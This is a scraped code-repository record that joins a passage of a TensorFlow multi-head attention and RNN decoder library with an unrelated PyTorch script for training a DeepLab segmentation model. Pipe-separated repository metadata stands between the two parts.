        swap_memory: Python bool, whether GPU-CPU memory swap is enabled.
            Argument passed to `tf.while_loop`.
        greedy_search: Python bool, use argmax if True, sample from
            distribution if False.

    Returns:
        output_ids, rnn_outputs, decoder_state
    """
    # Initialise `AttentionWrapperState` with provided RNN state
    state_init = cell.zero_state(batch_size, tf.float32)
    start_ids = tf.tile([start_id], multiples=[batch_size])
    _dprint('rnn_decoder_search: Initial state: {}'.format(state_init))
    _dprint('rnn_decoder_search: Cell state size: {}'.format(cell.state_size))

    # Greedy decoding takes the argmax token at each step; sample search draws
    # from the output distribution instead.
    if greedy_search:
        logger.debug('Building subgraph V4 for Greedy Search.')
        helper_fn = tf.contrib.seq2seq.GreedyEmbeddingHelper
    else:
        logger.debug('Building subgraph V4 for Sample Search.')
        helper_fn = tf.contrib.seq2seq.SampleEmbeddingHelper
    helper = helper_fn(
        embedding=embedding_fn,
        start_tokens=start_ids,
        end_token=end_id)
    decoder = tf.contrib.seq2seq.BasicDecoder(
        cell=cell,
        helper=helper,
        initial_state=state_init,
        output_layer=output_layer)
    dec_outputs, dec_states, _ = tf.contrib.seq2seq.dynamic_decode(
        decoder=decoder,
        output_time_major=True,
        impute_finished=False,
        maximum_iterations=maximum_iterations,
        parallel_iterations=1,
        swap_memory=swap_memory)

    # `dec_outputs` will be a `BasicDecoderOutput` object
    # `dec_states` may be a `AttentionWrapperState` object
    rnn_out = dec_outputs.rnn_output
    output_ids = dec_outputs.sample_id
    return output_ids, rnn_out, dec_states
def rnn_decoder_training(cell,
                         embeddings,
                         output_layer,
                         batch_size,
                         sequence_length,
                         swap_memory=True):
    """
    Teacher-forced dynamic RNN loop for training, in time-major mode.

    Decoding stops per-example once its `sequence_length` is reached; the
    outputs are then padded back to the full input length by repeating the
    last emitted step (required because `impute_finished=True` truncates).

    Args:
        cell: An `RNNCell` instance (with or without attention).
        embeddings: A float32 tensor of shape [time, batch, word_size].
        output_layer: An instance of `tf.layers.Layer`, i.e.,
            `tf.layers.Dense`, applied to the RNN output. `None` disables it.
        batch_size: Int scalar. Size of batch.
        sequence_length: An int32 vector tensor of per-example lengths.
        swap_memory: Python bool, forwarded to `tf.while_loop` for
            GPU-CPU memory swapping.

    Returns:
        output_ids, rnn_outputs, decoder_state
    """
    logger.debug('Building dynamic decode subgraph V4 for training.')

    initial_state = cell.zero_state(batch_size, tf.float32)
    _dprint('rnn_decoder_training: Initial state: {}'.format(initial_state))
    _dprint('rnn_decoder_training: Cell state size: {}'.format(cell.state_size))

    train_helper = tf.contrib.seq2seq.TrainingHelper(
        inputs=embeddings,
        sequence_length=sequence_length,
        time_major=True)
    basic_decoder = tf.contrib.seq2seq.BasicDecoder(
        cell=cell,
        helper=train_helper,
        initial_state=initial_state,
        output_layer=output_layer)
    outputs, final_state, _ = tf.contrib.seq2seq.dynamic_decode(
        decoder=basic_decoder,
        output_time_major=True,
        impute_finished=True,
        maximum_iterations=None,
        parallel_iterations=1,
        swap_memory=swap_memory)

    # `outputs` is a `BasicDecoderOutput`; `final_state` may be an
    # `AttentionWrapperState`.
    cell_outputs = outputs.rnn_output
    word_ids = outputs.sample_id

    # Pad along the time axis by repeating the last emitted step so the
    # results span the full `max_time` of `embeddings`.
    num_pad = tf.shape(embeddings)[0] - tf.shape(cell_outputs)[0]
    out_pad = tf.tile(cell_outputs[-1:, :, :], [num_pad, 1, 1])
    cell_outputs = tf.concat([cell_outputs, out_pad], axis=0)  # (max_time, batch_size, rnn_size)
    id_pad = tf.tile(word_ids[-1:, :], [num_pad, 1])
    word_ids = tf.concat([word_ids, id_pad], axis=0)  # (max_time, batch_size)
    return word_ids, cell_outputs, final_state
def split_heads(x, num_heads):
    """Split channels (dimension 3) into multiple heads (becomes dimension 1).

    Args:
        x: a Tensor with shape [batch, length, channels]
        num_heads: an integer

    Returns:
        a Tensor with shape [batch, num_heads, length, channels / num_heads]
    """
    in_shape = _shape(x)
    channels = in_shape[-1]
    # -1 lets reshape infer the per-head depth when channels is unknown.
    head_depth = channels // num_heads if channels else -1
    reshaped = tf.reshape(x, in_shape[:-1] + [num_heads, head_depth], 'split_head')
    return tf.transpose(reshaped, [0, 2, 1, 3])
def combine_heads(x):
    """Inverse of split_heads.

    Args:
        x: a Tensor with shape [batch, num_heads, length, channels / num_heads]

    Returns:
        a Tensor with shape [batch, length, channels]
    """
    transposed = tf.transpose(x, [0, 2, 1, 3])
    in_shape = _shape(transposed)
    heads, depth = in_shape[-2:]
    # -1 lets reshape infer the merged channel size when dims are unknown.
    merged = heads * depth if heads and depth else -1
    return tf.reshape(transposed, in_shape[:-2] + [merged], 'combine_head')
###############################################################################
# noinspection PyProtectedMember
class MultiHeadAttV3(attention_wrapper._BaseAttentionMechanism):
    """
    Implements multi-head attention.

    Base class for the additive / dot-product scorers below; it builds the
    (optionally pruning-masked) query/memory/value projections and the
    per-head split of the memory.
    """

    # TODO: bookmark
    # noinspection PyCallingNonCallable
    def __init__(self,
                 num_units,
                 feature_map,
                 fm_projection,
                 num_heads=None,
                 scale=True,
                 memory_sequence_length=None,
                 probability_fn=tf.nn.softmax,
                 mask_type=None,
                 mask_init_value=0,
                 mask_bern_sample=False,
                 name='MultiHeadAttV3'):
        """
        Construct the AttentionMechanism mechanism.

        Args:
            num_units: The depth of the attention mechanism.
            feature_map: The feature map / memory to query. This tensor
                should be shaped `[batch_size, height * width, channels]`.
            fm_projection: Feature map projection mode; one of
                `None`, 'independent', 'tied'.
            num_heads: Int, number of attention heads. (optional)
            scale: Python boolean. Whether to scale the energy term.
            memory_sequence_length: Tensor indicating sequence length.
            probability_fn: (optional) A `callable`. Converts the score
                to probabilities. The default is `tf.nn.softmax`.
            mask_type: Pruning-mask type forwarded to `masked_layer`;
                `None` disables weight masking.
            mask_init_value: Initial value for the pruning masks.
            mask_bern_sample: Whether the masks are Bernoulli-sampled.
            name: Name to use when creating ops.
        """
        logger.debug('Using MultiHeadAttV3.')
        assert fm_projection in [None, 'independent', 'tied']
        # if memory_sequence_length is not None:
        #     assert len(_shape(memory_sequence_length)) == 2, \
        #         '`memory_sequence_length` must be a rank-2 tensor, ' \
        #         'shaped [batch_size, num_heads].'

        # Choose between plain Dense layers and pruning-masked Dense layers.
        if mask_type is None:
            self._dense_layer = Dense
            self._mask_params = {}
        else:
            self._dense_layer = masked_layer.MaskedDense
            self._mask_params = dict(mask_type=mask_type,
                                     mask_init_value=mask_init_value,
                                     mask_bern_sample=mask_bern_sample)

        super(MultiHeadAttV3, self).__init__(
            query_layer=self._dense_layer(units=num_units, name='query_layer', use_bias=False, **self._mask_params),
            # query is projected hidden state
            memory_layer=self._dense_layer(units=num_units, name='memory_layer', use_bias=False, **self._mask_params),
            # self._keys is projected feature_map
            memory=feature_map,  # self._values is feature_map
            probability_fn=lambda score, _: probability_fn(score),
            memory_sequence_length=None,
            score_mask_value=float('-inf'),
            name=name)
        # Re-bind the probability fn so multi-head length masking (if any)
        # happens before the probability function is applied.
        self._probability_fn = lambda score, _: (
            probability_fn(
                self._maybe_mask_score_multi(
                    score, memory_sequence_length, float('-inf'))))
        self._fm_projection = fm_projection
        self._num_units = num_units
        self._num_heads = num_heads
        self._scale = scale
        self._feature_map_shape = _shape(feature_map)
        self._name = name

        if fm_projection == 'tied':
            assert num_units % num_heads == 0, \
                'For `tied` projection, attention size/depth must be ' \
                'divisible by the number of attention heads.'
            # Values share the key projection.
            self._values_split = split_heads(self._keys, self._num_heads)
        elif fm_projection == 'independent':
            assert num_units % num_heads == 0, \
                'For `untied` projection, attention size/depth must be ' \
                'divisible by the number of attention heads.'
            # Project and split memory
            v_layer = self._dense_layer(units=num_units, name='value_layer', use_bias=False, **self._mask_params)
            # (batch_size, num_heads, mem_size, num_units / num_heads)
            self._values_split = split_heads(v_layer(self._values), self._num_heads)
        else:
            assert _shape(self._values)[-1] % num_heads == 0, \
                'For `none` projection, feature map channel dim size must ' \
                'be divisible by the number of attention heads.'
            # No projection: split the raw feature map into heads.
            self._values_split = split_heads(self._values, self._num_heads)

        _dprint('{}: FM projection type: {}'.format(
            self.__class__.__name__, fm_projection))
        _dprint('{}: Splitted values shape: {}'.format(
            self.__class__.__name__, _shape(self._values_split)))
        _dprint('{}: Values shape: {}'.format(
            self.__class__.__name__, _shape(self._values)))
        _dprint('{}: Keys shape: {}'.format(
            self.__class__.__name__, _shape(self._keys)))
        _dprint('{}: Feature map shape: {}'.format(
            self.__class__.__name__, _shape(feature_map)))

    @property
    def values_split(self):
        # Memory values split per attention head.
        return self._values_split

    def initial_alignments(self, batch_size, dtype):
        """Creates the initial alignment values for the `AttentionWrapper` class.

        This is important for AttentionMechanisms that use the previous alignment
        to calculate the alignment at the next time step (e.g. monotonic attention).

        The default behavior is to return a tensor of all zeros.

        Args:
            batch_size: `int32` scalar, the batch_size.
            dtype: The `dtype`.

        Returns:
            A `dtype` tensor shaped `[batch_size, alignments_size]`
            (`alignments_size` is the values' `max_time`).
        """
        del batch_size
        # Heads are flattened into one axis: [batch, num_heads * mem_size].
        s = _shape(self.values_split)[:-1]
        init = tf.zeros(shape=[s[0], s[1] * s[2]], dtype=dtype)
        _dprint('{}: Initial alignments shape: {}'.format(self.__class__.__name__, _shape(init)))
        return init

    def _maybe_mask_score_multi(self,
                                score,
                                memory_sequence_length,
                                score_mask_value):
        # Replace scores at invalid memory positions with `score_mask_value`,
        # per head; no-op when no sequence lengths were given.
        if memory_sequence_length is None:
            return score
        message = 'All values in memory_sequence_length must greater than zero.'
        with tf.control_dependencies(
                [tf.assert_positive(memory_sequence_length, message=message)]):
            # NOTE(review): stray debug print left in -- consider removing.
            print(_shape(score))
            score_mask = tf.sequence_mask(
                memory_sequence_length, maxlen=tf.shape(score)[2])
            score_mask_values = score_mask_value * tf.ones_like(score)
            masked_score = tf.where(score_mask, score, score_mask_values)
            _dprint('{}: score shape: {}'.format(
                self.__class__.__name__, _shape(score)))
            _dprint('{}: masked_score shape: {}'.format(
                self.__class__.__name__, _shape(masked_score)))
            return masked_score
class MultiHeadAddLN(MultiHeadAttV3):
    """
    Implements Toronto-style (Xu et al.) attention scoring with layer norm,
    as described in:
    "Show, Attend and Tell: Neural Image Caption Generation with
    Visual Attention." ICML 2015. https://arxiv.org/abs/1502.03044
    """

    def __call__(self, query, state):
        """
        Score the query based on the keys and values.

        Args:
            query: RNN hidden state. Tensor of shape `[batch_size, num_units]`.
            state: IGNORED. Previous alignment values.
                (`alignments_size` is memory's `max_time`).

        Returns:
            alignments: Tensor of dtype matching `self.values` and shape
                `[batch_size, alignments_size]` (`alignments_size` is memory's
                `max_time`).
        """
        del state
        with tf.variable_scope(None, 'multi_add_attention', [query]):
            # Reshape from [batch_size, ...] to [batch_size, 1, ...] for broadcasting.
            proj_query = tf.expand_dims(self.query_layer(query), 1)
            v = tf.get_variable(
                'attention_v', [self._num_units], dtype=proj_query.dtype)
            if len(self._mask_params) > 0:
                # Apply the pruning mask to the score vector `v` as well.
                v, _ = masked_layer.generate_masks(kernel=v, bias=None,
                                                   dtype=proj_query.dtype,
                                                   **self._mask_params)
            # Additive (Bahdanau-style) energies with a layer-norm'ed tanh.
            score = self._keys + proj_query
            score = _layer_norm_tanh(score)
            score = tf.multiply(score, v)
            score = split_heads(score, self._num_heads)  # (batch_size, num_heads, mem_size, num_units / num_heads)
            score = tf.reduce_sum(score, axis=3)  # (batch_size, num_heads, mem_size)

            if self._scale:
                # Learnable softmax temperature, initialised at 5.0 and also
                # registered in the 'softmax_temperatures' collection.
                softmax_temperature = tf.get_variable(
                    'softmax_temperature',
                    shape=[],
                    dtype=tf.float32,
                    initializer=tf.constant_initializer(5.0),
                    collections=[tf.GraphKeys.GLOBAL_VARIABLES,
                                 'softmax_temperatures'])
                score = tf.truediv(score, softmax_temperature)

            alignments = self._probability_fn(score, None)
            next_state = alignments
            _dprint('{}: Alignments shape: {}'.format(
                self.__class__.__name__, _shape(alignments)))
            return alignments, next_state
class MultiHeadAdd(MultiHeadAttV3):
    """
    Implements Toronto-style (Xu et al.) attention scoring,
    as described in:
    "Show, Attend and Tell: Neural Image Caption Generation with
    Visual Attention." ICML 2015. https://arxiv.org/abs/1502.03044
    """

    def __call__(self, query, state):
        """
        Score the query based on the keys and values.

        Args:
            query: RNN hidden state. Tensor of shape `[batch_size, num_units]`.
            state: IGNORED. Previous alignment values.
                (`alignments_size` is memory's `max_time`).

        Returns:
            alignments: Tensor of dtype matching `self.values` and shape
                `[batch_size, alignments_size]` (`alignments_size` is memory's
                `max_time`).
        """
        del state
        with tf.variable_scope(None, 'MultiHeadAdd', [query]):
            # Reshape from [batch_size, ...] to [batch_size, 1, ...] for broadcasting.
            proj_query = tf.expand_dims(self.query_layer(query), 1)
            v = tf.get_variable(
                'attention_v', [self._num_units], dtype=proj_query.dtype)
            if len(self._mask_params) > 0:
                # Apply the pruning mask to the score vector `v` as well.
                v, _ = masked_layer.generate_masks(kernel=v,
                                                   bias=None,
                                                   dtype=proj_query.dtype,
                                                   **self._mask_params)
            # Additive (Bahdanau-style) energies: tanh(keys + query) . v
            score = self._keys + proj_query
            score = tf.nn.tanh(score)
            score = tf.multiply(score, v)
            score = split_heads(score, self._num_heads)  # (batch_size, num_heads, mem_size, num_units / num_heads)
            score = tf.reduce_sum(score, axis=3)  # (batch_size, num_heads, mem_size)
            alignments = self._probability_fn(score, None)
            next_state = alignments
            _dprint('{}: Alignments shape: {}'.format(
                self.__class__.__name__, _shape(alignments)))
            return alignments, next_state
class MultiHeadDot(MultiHeadAttV3):
    """
    Implements scaled dot-product scoring,
    as described in:
    "Attention is all you need." NIPS 2017.
    https://papers.nips.cc/paper/7181-attention-is-all-you-need.pdf
    """

    def __call__(self, query, state):
        """
        Score the query based on the keys and values.

        Args:
            query: RNN hidden state. Tensor of shape `[batch_size, num_units]`.
            state: IGNORED. Previous alignment values.
                (`alignments_size` is memory's `max_time`).

        Returns:
            alignments: Tensor of dtype matching `self.values` and shape
                `[batch_size, alignments_size]` (`alignments_size` is memory's
                `max_time`).
        """
        del state
        with tf.variable_scope(None, 'MultiHeadDot', [query]):
            # Reshape from [batch_size, ...] to [batch_size, 1, ...] for broadcasting.
            proj_query = tf.expand_dims(self.query_layer(query), 1)  # (batch_size, 1, num_units)
            # Elementwise product then per-head sum == per-head dot product.
            score = tf.multiply(self._keys, proj_query)
            score = split_heads(score, self._num_heads)  # (batch_size, num_heads, mem_size, num_units / num_heads)
            score = tf.reduce_sum(score, axis=3)  # (batch_size, num_heads, mem_size)
            # NOTE(review): under Python 2, `self._num_units / self._num_heads`
            # is integer division when both are ints; confirm the intended
            # (float) scaling factor for tf.sqrt here.
            score /= tf.sqrt(self._num_units / self._num_heads)
            alignments = self._probability_fn(score, None)
            next_state = alignments
            _dprint('{}: Alignments shape: {}'.format(
                self.__class__.__name__, _shape(alignments)))
            return alignments, next_state
# noinspection PyProtectedMember
class MultiHeadAttentionWrapperV3(attention_wrapper.AttentionWrapper):
    """
    Wraps another `RNNCell` with attention, similar to `AttentionWrapper`.
    Allows optional multi-head attention.

    Logits projection should be performed at the decoder by passing in
    an instance of `tf.layers.Layer`, i.e. `tf.layers.Dense`, as
    `output_layer`.

    skip_att_threshold: If value is in range (0, 1), perform binarisation;
    else perform bernoulli sampling.
    """

    # TODO: bookmark
    def __init__(self,
                 context_layer=True,
                 alignments_keep_prob=1.0,
                 mask_type=None,
                 mask_init_value=0,
                 mask_bern_sample=False,
                 **kwargs):
        """
        Args:
            context_layer: If True, project the attention context vector with
                a (possibly pruning-masked) dense layer named 'a_layer'.
            alignments_keep_prob: Dropout keep probability applied to the
                attention alignments; 1.0 disables the dropout.
            mask_type: Pruning-mask type forwarded to `masked_layer`;
                `None` disables weight masking.
            mask_init_value: Initial value for the pruning masks.
            mask_bern_sample: Whether the masks are Bernoulli-sampled.
            **kwargs: Forwarded to `AttentionWrapper.__init__`; exactly one
                attention mechanism must be supplied.

        Raises:
            ValueError: If more than one attention mechanism is given.
        """
        logger.debug('Using {}.'.format(self.__class__.__name__))
        super(MultiHeadAttentionWrapperV3, self).__init__(**kwargs)
        if len(self._attention_mechanisms) != 1:
            raise ValueError('Only a single attention mechanism can be used.')
        self._context_layer = context_layer
        self._alignments_keep_prob = alignments_keep_prob
        # Choose between plain Dense and pruning-masked Dense for 'a_layer'.
        if mask_type is None:
            self._dense_layer = Dense
            self._mask_params = {}
        else:
            self._dense_layer = masked_layer.MaskedDense
            self._mask_params = dict(mask_type=mask_type,
                                     mask_init_value=mask_init_value,
                                     mask_bern_sample=mask_bern_sample)

    # noinspection PyCallingNonCallable
    def call(self, inputs, prev_state):
        """
        Perform a step of attention-wrapped RNN.

        This method assumes `inputs` is the word embedding vector.
        This method overrides the original `call()` method.
        """
        # Cleanup: removed unused locals (`attn_size`, a shadowing local
        # `batch_size`, and a dead first `dtype = inputs.dtype` assignment
        # that was overwritten before use).
        _attn_mech = self._attention_mechanisms[0]

        # Step 1: Calculate the true inputs to the cell based on the
        # previous attention value.
        # `_cell_input_fn` defaults to
        # `lambda inputs, attention: array_ops.concat([inputs, attention], -1)`
        _dprint('{}: prev_state received by call(): {}'.format(
            self.__class__.__name__, prev_state))
        cell_inputs = self._cell_input_fn(inputs, prev_state.attention)
        prev_cell_state = prev_state.cell_state
        cell_output, curr_cell_state = self._cell(cell_inputs, prev_cell_state)

        cell_batch_size = (cell_output.shape[0].value or tf.shape(cell_output)[0])
        error_message = (
            "When applying AttentionWrapper %s: " % self.name +
            "Non-matching batch sizes between the memory (encoder output) "
            "and the query (decoder output). Are you using the "
            "BeamSearchDecoder? You may need to tile your memory input via "
            "the tf.contrib.seq2seq.tile_batch function with argument "
            "multiple=beam_width.")
        with tf.control_dependencies(
                [tf.assert_equal(cell_batch_size, _attn_mech.batch_size, message=error_message)]):
            cell_output = tf.identity(cell_output, name="checked_cell_output")
        dtype = cell_output.dtype

        assert len(self._attention_mechanisms) == 1
        alignments, attention_state = _attn_mech(cell_output, state=None)

        if self._alignments_keep_prob < 1.:
            # Attention dropout; note `is_training=True`, i.e. it is applied
            # unconditionally (also at inference).
            alignments = tf.contrib.layers.dropout(inputs=alignments,
                                                   keep_prob=self._alignments_keep_prob,
                                                   noise_shape=None,
                                                   is_training=True)

        if len(_shape(alignments)) == 3:
            # Multi-head attention
            # Expand from [batch_size, num_heads, memory_time] to
            # [batch_size, num_heads, 1, memory_time]
            expanded_alignments = tf.expand_dims(alignments, 2)
            # attention_mechanism.values shape is
            #     [batch_size, num_heads, memory_time, num_units / num_heads]
            # the batched matmul is over memory_time, so the output shape is
            #     [batch_size, num_heads, 1, num_units / num_heads].
            # we then combine the heads
            #     [batch_size, 1, attention_mechanism.num_units]
            attention_mechanism_values = _attn_mech.values_split
            context = tf.matmul(expanded_alignments, attention_mechanism_values)
            attention = tf.squeeze(combine_heads(context), [1])
        else:
            # Single-head attention (stock AttentionWrapper behaviour).
            # Expand from [batch_size, memory_time] to [batch_size, 1, memory_time]
            expanded_alignments = tf.expand_dims(alignments, 1)
            # Context is the inner product of alignments and values along the
            # memory time dimension.
            # alignments shape is
            #     [batch_size, 1, memory_time]
            # attention_mechanism.values shape is
            #     [batch_size, memory_time, attention_mechanism.num_units]
            # the batched matmul is over memory_time, so the output shape is
            #     [batch_size, 1, attention_mechanism.num_units].
            # we then squeeze out the singleton dim.
            attention_mechanism_values = _attn_mech.values
            context = tf.matmul(expanded_alignments, attention_mechanism_values)
            attention = tf.squeeze(context, [1])

        # Context projection
        if self._context_layer:
            # noinspection PyCallingNonCallable
            attention = self._dense_layer(name='a_layer',
                                          units=_attn_mech._num_units,
                                          use_bias=False,
                                          activation=None,
                                          dtype=dtype,
                                          **self._mask_params)(attention)

        if self._alignment_history:
            # Heads (if any) are flattened before being stored.
            alignments = tf.reshape(alignments, [cell_batch_size, -1])
            alignment_history = prev_state.alignment_history.write(prev_state.time, alignments)
        else:
            alignment_history = ()

        curr_state = attention_wrapper.AttentionWrapperState(
            time=prev_state.time + 1,
            cell_state=curr_cell_state,
            attention=attention,
            attention_state=alignments,
            alignments=alignments,
            alignment_history=alignment_history
        )
        return cell_output, curr_state

    @property
    def state_size(self):
        """State sizes adjusted for the flattened multi-head alignments."""
        state = super(MultiHeadAttentionWrapperV3, self).state_size
        _attn_mech = self._attention_mechanisms[0]
        # (num_heads, mem_size) of the split values -> flattened alignment size.
        s = _shape(_attn_mech._values_split)[1:3]
        state = state._replace(alignments=s[0] * s[1],
                               alignment_history=s[0] * s[1] if self._alignment_history else (),
                               attention_state=s[0] * s[1])
        # Without projection and context layer, the attention vector keeps the
        # raw feature-map channel size.
        if _attn_mech._fm_projection is None and self._context_layer is False:
            state = state.clone(attention=_attn_mech._feature_map_shape[-1])
        else:
            state = state.clone(attention=_attn_mech._num_units)
        _dprint('{}: state_size: {}'.format(self.__class__.__name__, state))
        return state

    # noinspection PyProtectedMember
    def zero_state(self, batch_size, dtype):
        """Zero state with the attention vector sized to match `state_size`."""
        state = super(MultiHeadAttentionWrapperV3, self).zero_state(
            batch_size, dtype)
        _attn_mech = self._attention_mechanisms[0]
        tf_ary_kwargs = dict(dtype=dtype,
                             size=0,
                             dynamic_size=True,
                             element_shape=None)
        if _attn_mech._fm_projection is None and self._context_layer is False:
            state = state._replace(
                attention=tf.zeros(
                    [batch_size, _attn_mech._feature_map_shape[-1]], dtype),
                alignment_history=tf.TensorArray(**tf_ary_kwargs) if self._alignment_history else ())
        else:
            state = state._replace(
                attention=tf.zeros(
                    [batch_size, _attn_mech._num_units], dtype),
                alignment_history=tf.TensorArray(**tf_ary_kwargs) if self._alignment_history else ())
        _dprint('{}: zero_state: {}'.format(self.__class__.__name__, state))
        return state
class BeamSearchDecoderMultiHead(tf.contrib.seq2seq.BeamSearchDecoder):
    """
    `BeamSearchDecoder` variant used with `MultiHeadAttentionWrapperV3`.

    The stock decoder additionally runs a static batch/beam shape check before
    sorting cell-state `TensorArray`s; this subclass skips that static check
    (it is commented out below) and relies only on the runtime
    `_check_batch_beam` assertion.
    """

    # noinspection PyProtectedMember
    def _maybe_sort_array_beams(self, t, parent_ids, sequence_length):
        """Maybe sorts beams within a `TensorArray`.

        Args:
            t: A `TensorArray` of size `max_time` that contains `Tensor`s of shape
                `[batch_size, beam_width, s]` or `[batch_size * beam_width, s]` where
                `s` is the depth shape.
            parent_ids: The parent ids of shape `[max_time, batch_size, beam_width]`.
            sequence_length: The sequence length of shape `[batch_size, beam_width]`.

        Returns:
            A `TensorArray` where beams are sorted in each `Tensor` or `t` itself if
            it is not a `TensorArray` or does not meet shape requirements.
        """
        if not isinstance(t, tf.TensorArray):
            return t
        # pylint: disable=protected-access
        if (not t._infer_shape or not t._element_shape
                or t._element_shape[0].ndims is None
                or t._element_shape[0].ndims < 1):
            shape = (
                t._element_shape[0] if t._infer_shape and t._element_shape
                else tf.TensorShape(None))
            # Bug fix: `tf.logger` does not exist in TF 1.x -- the logging
            # module is `tf.logging`; the original call raised AttributeError
            # whenever this warning path was hit.
            tf.logging.warn("The TensorArray %s in the cell state is not amenable to "
                            "sorting based on the beam search result. For a "
                            "TensorArray to be sorted, its elements shape must be "
                            "defined and have at least a rank of 1, but saw shape: %s"
                            % (t.handle.name, shape))
            return t
        # shape = t._element_shape[0]
        # pylint: enable=protected-access
        # if not _check_static_batch_beam_maybe(
        #         shape, tensor_util.constant_value(self._batch_size), self._beam_width):
        #     return t
        t = t.stack()
        with tf.control_dependencies(
                [_check_batch_beam(t, self._batch_size, self._beam_width)]):
            return gather_tree_from_array(t, parent_ids, sequence_length)
| [
"tanjiahuei@gmail.com"
] | tanjiahuei@gmail.com |
8e20f5f2b9d24a61c69796e934e556c5c6aec474 | a91484418beb39bd1d8ea4f59dedb1ad0a10cfcf | /train_deep.py | abc2d5ca1c42949039b453fa63cf0427c579ccb8 | [] | no_license | kaichoulyc/course_segmentation | 2991b3bcb38bf46036c61612c653c55e067bbe0b | 4d5b14d9e91cea446c289a08e3f7f01cc4e51c6e | refs/heads/master | 2020-05-31T08:18:32.050944 | 2020-01-09T11:54:35 | 2020-01-09T11:54:35 | 190,186,499 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 4,506 | py | import torch
import numpy as np
import os
from tqdm import tqdm
import pandas as pd
from utils.iou import compute_mask_iou
from utils.generator import claim_generator
from utils.losses import *
from model.deep_lab.deeplab import *
import timeit
import datetime
# Dataset root and split directories.
abs_path = '/home/kaichou/ssd/course'
train_path = os.path.join(abs_path, 'train')
valid_path = os.path.join(abs_path, 'valid')
test_path = os.path.join(abs_path, 'test')

# Per-epoch metrics accumulated here and dumped to csv after each epoch.
epochs_df = pd.DataFrame(columns = ['Epoch', 'Train_loss', 'Val_loss', 'Val_IoU', 'Time'])

model_type = 'deeplab'
# [model class, numeric tag (unused below), display name used in file names]
model_conf = [DeepLab, 18, 'DeepLab']
num_workers = 10

# Timestamp suffix so each run writes a distinct metrics file.
uniq = datetime.datetime.now()
uniq_add = f'_{uniq.day}-{uniq.month}-{uniq.year}-{uniq.hour}-{uniq.minute}-{uniq.second}_'
way_to_info = 'information/' + model_type + '/' + model_conf[2] + uniq_add + 'inf.csv'

# Hyper-parameters are read interactively from stdin.
print('Enter learning rate:')
lr = float(input())
print('Enter amount of epochs:')
epochs = int(input())

path_for_weights = os.path.join('weights/', model_type)
path_for_model = os.path.join(path_for_weights, 'model')
path_for_optim = os.path.join(path_for_weights, 'optim')

# Batch size 4, 513x513 crops (standard DeepLab input size).
train_loader = claim_generator(train_path, 4, num_workers, 513, mode = 'train')
val_loader = claim_generator(valid_path, 4, num_workers, 513, mode = 'test')

model = model_conf[0]()

# 'lovasz' is the training loss, 'iou' the validation metric.
criterions = {
    'lovasz': Loss(1, 2),
    'iou': compute_mask_iou
}

# Two parameter groups exposed by the model: base lr and 10x lr.
train_params = [{'params': model.get_1x_lr_params(), 'lr': lr},
                {'params': model.get_10x_lr_params(), 'lr': lr * 10}]
optimizer = torch.optim.SGD(train_params, lr = lr, momentum=0.9, weight_decay=0.0005)

last_epoch = 0
# Optionally resume: type exactly "Yes" to load a saved checkpoint.
print('Load weghts?')
weights = input()
if weights == 'Yes':
    print('Needed epoch:')
    last_epoch = int(input())
    model.load_state_dict(torch.load(os.path.join(path_for_model, model_conf[2] + f'_model{last_epoch}' + '.pth')))
    optimizer.load_state_dict(torch.load(os.path.join(path_for_optim, model_conf[2] + f'_optim{last_epoch}' + '.pth')))
    # Move restored optimizer state tensors back onto the GPU.
    for state in optimizer.state.values():
        for k, v in state.items():
            if isinstance(v, torch.Tensor):
                state[k] = v.cuda()

device = torch.device('cuda')
model = model.to(device)
def validating(model, criterions, val_loader, device):
    """Run one evaluation pass over ``val_loader``.

    Args:
        model: network in eval mode; called as ``model(x)`` to get mask logits.
        criterions: dict with 'lovasz' (loss callable on (pred, target)) and
            'iou' (metric taking two numpy mask arrays).
        val_loader: iterable of (image, target) tensor batches.
        device: torch device the batches are moved to.

    Returns:
        Tuple of (mean loss, mean IoU) averaged over the batches.
    """
    model.eval()
    with torch.no_grad():
        epoch_loss_b = 0
        schet = 0
        iou_full = 0
        for x, y in val_loader:
            schet += 1
            x = x.to(device)
            y = y.to(device)
            mask_pred = model(x)
            loss_b = criterions['lovasz'](mask_pred, y)
            epoch_loss_b += loss_b.item()
            # Threshold sigmoid logits at 0.5 to get a binary mask.
            # Bug fix: np.float was removed in NumPy 1.24 — use an explicit dtype.
            pred_mask = (torch.sigmoid(mask_pred) > 0.5).cpu().squeeze(1).numpy().astype(np.float32)
            iou_full += criterions['iou'](y.cpu().squeeze(1).numpy(), pred_mask)
    return epoch_loss_b / schet, iou_full / schet
def traininng(model, st_epoch, epochs, criterions, optimizer, train_loader, path_for_model, path_for_optim, device, inf_df, model_conf, inf_way):
    """Train ``model`` from epoch ``st_epoch`` to ``epochs``.

    Each epoch: one pass over ``train_loader`` with the 'lovasz' loss,
    then validation, LR scheduling on the validation loss, a checkpoint
    every 3rd epoch, and a metrics-row appended to ``inf_df`` and written
    to ``inf_way``.

    NOTE(review): the function name has a typo ("traininng") — kept to
    avoid breaking the call site below.
    """
    # Reduce LR when validation loss plateaus.
    scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer = optimizer, mode = 'min', verbose = True)
    for epoch in tqdm(range(st_epoch, epochs)):
        st = timeit.default_timer()
        model.train()
        print('Starting epoch {}/{}.'.format(epoch + 1, epochs))
        epoch_loss = 0
        schet = 0  # batch counter for averaging the loss
        for x, y in train_loader:
            schet += 1
            x = x.to(device)
            # Targets need no gradient; moved to device under no_grad.
            with torch.no_grad():
                y = y.to(device)
            mask_pred = model(x)
            loss = criterions['lovasz'](mask_pred, y)
            epoch_loss += loss.item()
            optimizer.zero_grad()
            loss.backward()
            optimizer.step()
        val_loss, val_iou = validating(model, criterions, val_loader, device)
        scheduler.step(val_loss)
        print(f'Epoch finished ! Train Loss: {epoch_loss / schet} Valid loss: {val_loss} Val IoUc: {val_iou}')
        # Checkpoint model and optimizer every third epoch (epochs 3, 6, ...).
        if (epoch != 0) and (((epoch + 1) % 3) == 0):
            torch.save(model.state_dict(), os.path.join(path_for_model, model_conf[2] + f'_model{epoch + 1}.pth'))
            torch.save(optimizer.state_dict(), os.path.join(path_for_optim, model_conf[2] + f'_optim{epoch + 1}.pth'))
        fin = timeit.default_timer() - st
        print(f'Time spent on epoch {fin}')
        # Persist metrics after every epoch so a crash loses nothing.
        inf_df.loc[epoch] = [epoch + 1, epoch_loss / schet, val_loss, val_iou, fin]
        inf_df.to_csv(inf_way)


traininng(model, last_epoch, epochs, criterions, optimizer, train_loader, path_for_model, path_for_optim, device, epochs_df, model_conf, way_to_info)
"rustem98@list.ru"
] | rustem98@list.ru |
